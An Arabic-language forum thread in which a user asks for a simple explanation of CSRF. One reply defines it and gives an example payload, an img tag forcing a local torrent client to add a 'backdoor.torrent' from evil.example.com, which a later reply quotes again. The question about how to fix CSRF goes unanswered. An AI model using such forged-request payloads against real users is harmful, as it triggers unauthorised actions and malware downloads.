Ahmed Dev نشر 9 فبراير 2016 أرسل تقرير نشر 9 فبراير 2016 من يشرح لنا بشكل مبسط ثغرة csrf مع اعطاء امثلة وايضا الطريقة المثلى لكيفية ترقيعها اقتباس
0 هشام رزق الله نشر 15 فبراير 2016 أرسل تقرير نشر 15 فبراير 2016 وهي اختصار لـ Cross-site request forgery وتدعى هذه الثغرة باللغة العربية بثغرة تزوير الطلب عبر المواقع، وهي عبارة عن تمرير أوامر غير مرخصة بها من المستخدم الذي يثق به الموقع إليه، ولقد اكتشفت هذه الثغرة سنة 2001. مثال على هذه الثغرة: <img src="http://localhost:8080/gui/?action=add-url&s=http://evil.example.com/backdoor.torrent"> حيث أنه عند فتح هذه الصفحة سيتم فتح باب خلفي كما هو ظاهر حيث تم تمرير رابط خبيث إلى الصورة ولم يتم التأكد من محتويات وسم الصور. اقتباس
0 Salem_FITURI نشر 18 فبراير 2016 أرسل تقرير نشر 18 فبراير 2016 بتاريخ On 15/2/2016 at 20:31 قال هشام رزق الله: مثال على هذه الثغرة: <img src="http://localhost:8080/gui/?action=add-url&s=http://evil.example.com/backdoor.torrent"> حيث أنه عند فتح هذه الصفحة سيتم فتح باب خلفي كما هو ظاهر حيث تم تمرير رابط خبيث إلى الصورة ولم يتم التأكد من محتويات وسم الصور. سمعت عن ثغرة شبيهة تخص الويندوز و بالتحديد متصفح IE حيث يتم تضمين كود جافاسكريب بذاخل ملف الصورة . بالنسبة للمثال المرفق هل الرابط بشكله الحالي لازال يشكل خطر على المستدمين ام تم حل هذه الثغرة ! اقتباس
السؤال
Ahmed Dev
من يشرح لنا بشكل مبسط ثغرة csrf مع اعطاء امثلة وايضا الطريقة المثلى لكيفية ترقيعها
2 أجوبة على هذا السؤال
Recommended Posts
انضم إلى النقاش
يمكنك أن تنشر الآن وتسجل لاحقًا. إذا كان لديك حساب، فسجل الدخول الآن لتنشر باسم حسابك.